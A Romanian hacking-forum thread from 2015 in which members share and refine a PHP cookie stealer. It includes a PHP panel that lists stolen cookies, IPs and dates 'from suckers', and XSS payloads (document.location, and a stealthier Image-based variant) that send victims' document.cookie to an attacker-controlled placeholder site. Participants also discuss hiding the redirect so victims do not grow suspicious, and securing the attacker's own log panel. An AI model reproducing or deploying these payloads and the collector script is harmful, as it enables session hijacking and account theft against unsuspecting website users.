shadowSQLi Posted March 21, 2015 Report Share Posted March 21, 2015 (edited) https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762 Edited March 22, 2015 by shadowSQLi Quote Link to comment Share on other sites More sharing options...
Sim Master Posted March 21, 2015 Report Share Posted March 21, 2015 De ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html? Quote Link to comment Share on other sites More sharing options...
QUADMACHINE Posted March 21, 2015 Report Share Posted March 21, 2015 <?php//////////////////////// Cookie stealer//////////////////////*Database stuff*/define(host, ""); //localhost as usualdefine(user, ""); //root, gigel sau petricadefine(pass, ""); //parola de la userdefine(db, ""); //numele la baza de datetry { $db = new mysqli(host, user, pass, db); } catch (mysqli_sql_exception $e) { throw $e; } if(isset($_GET['act']) && ($_GET['act'] == "prune")){//Va sterge rezultate mai vechi de 30 zile. $del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < DATEADD(day, -30, GETDATE())"; $db->query($del_oldrecords); $affected_rows = $db->affected_rows; print $affected_rows;}$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";$raw = $db->query($cookie);if(!$raw)){ die('There was an error running the query [' . $db->error . ']')}$values = $raw->fetch_all(MYSQLI_ASSOC);$results = $raw->num_rows;print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';print 'We\'ve stealed '.number_format($results).' cookies from suckers.';foreach($values as $key){ print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';}?> Quote Link to comment Share on other sites More sharing options...
askwrite Posted March 22, 2015 Report Share Posted March 22, 2015 De ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html?Pentru ca copy paste Quote Link to comment Share on other sites More sharing options...
activated Posted March 22, 2015 Report Share Posted March 22, 2015 de ce pe unele site-uri cu xss merge document.location="http://sitetau.com/cookie.php?shadow=" + document.cookie; si la unele numai document.location="http://sitetau.com/cookie.php?shadow=" adica fara document.cookie? Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 (edited) Pentru ca copy paste de unde concluzia ca am copiat? e facut de mine doar conexiunea spre mysql am copiat-oDe ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html?Pentru ca ID e setat din phpmyadmin sa aibe autoincrement. Edited March 22, 2015 by TheTime Quote Link to comment Share on other sites More sharing options...
Genius++ Posted March 22, 2015 Report Share Posted March 22, 2015 Face cineva un video ? + era o treaba misto sa se execute script-ul dintr-o imagine cum ar fii un smiley . Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 Face cineva un video ? + era o treaba misto sa se execute script-ul dintr-o imagine cum ar fii un smiley .o sa fac eu in aceasta noapte ca acum mai am de modificat la script si incerc sa fac si un design cat de cat ok Quote Link to comment Share on other sites More sharing options...
askwrite Posted March 22, 2015 Report Share Posted March 22, 2015 Si practic ce-ai facut tu daca ai zis c-ai copiat sqlul? ah, ai stocat un get... 1 Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 Si practic ce-ai facut tu daca ai zis c-ai copiat sqlul? ah, ai stocat un get...11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi) Quote Link to comment Share on other sites More sharing options...
QUADMACHINE Posted March 22, 2015 Report Share Posted March 22, 2015 Ce frustrat, da dislike la tot ce este in threadul asta.Este exact ca si un caine de curte, daca ii invadeaza cineva spatiul musca pe oricine. Quote Link to comment Share on other sites More sharing options...
askwrite Posted March 22, 2015 Report Share Posted March 22, 2015 Ahahaha, tot eu sunt fustrat cand tu ai venit sa suferi aici pentru un dislike dat din gresesla. Butoanele de like / dislike sunt pentru a fi folosite. Quote Link to comment Share on other sites More sharing options...
QUADMACHINE Posted March 22, 2015 Report Share Posted March 22, 2015 Si de aceea in 47 secunde am primit 8 dislikeuri de la tine, nu? Ca sufar eu pentru un dislike? Chill ganja man, am anuntat un administrator.Prepare ur anus! Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 (edited) Demo: Fac modificari:D Edited March 22, 2015 by shadowSQLi 1 Quote Link to comment Share on other sites More sharing options...
TheTime Posted March 22, 2015 Report Share Posted March 22, 2015 Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!Si pune o parola pentru accesarea logurilor. Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!Si pune o parola pentru accesarea logurilor.Ok, multumesc o sa ma ocup acum:D Quote Link to comment Share on other sites More sharing options...
Active Members 0xStrait Posted March 22, 2015 Active Members Report Share Posted March 22, 2015 O idee mai buna pentru a nu redirectiona persoana de pe pagina este sa folosesti o imagine, faptul ca victima va fi redirectionata pe o pagina poate trezi suspiciuni.<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script> Quote Link to comment Share on other sites More sharing options...
shadowSQLi Posted March 22, 2015 Author Report Share Posted March 22, 2015 gata..https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762 @0xStraitAm postat vectorul tau Quote Link to comment Share on other sites More sharing options...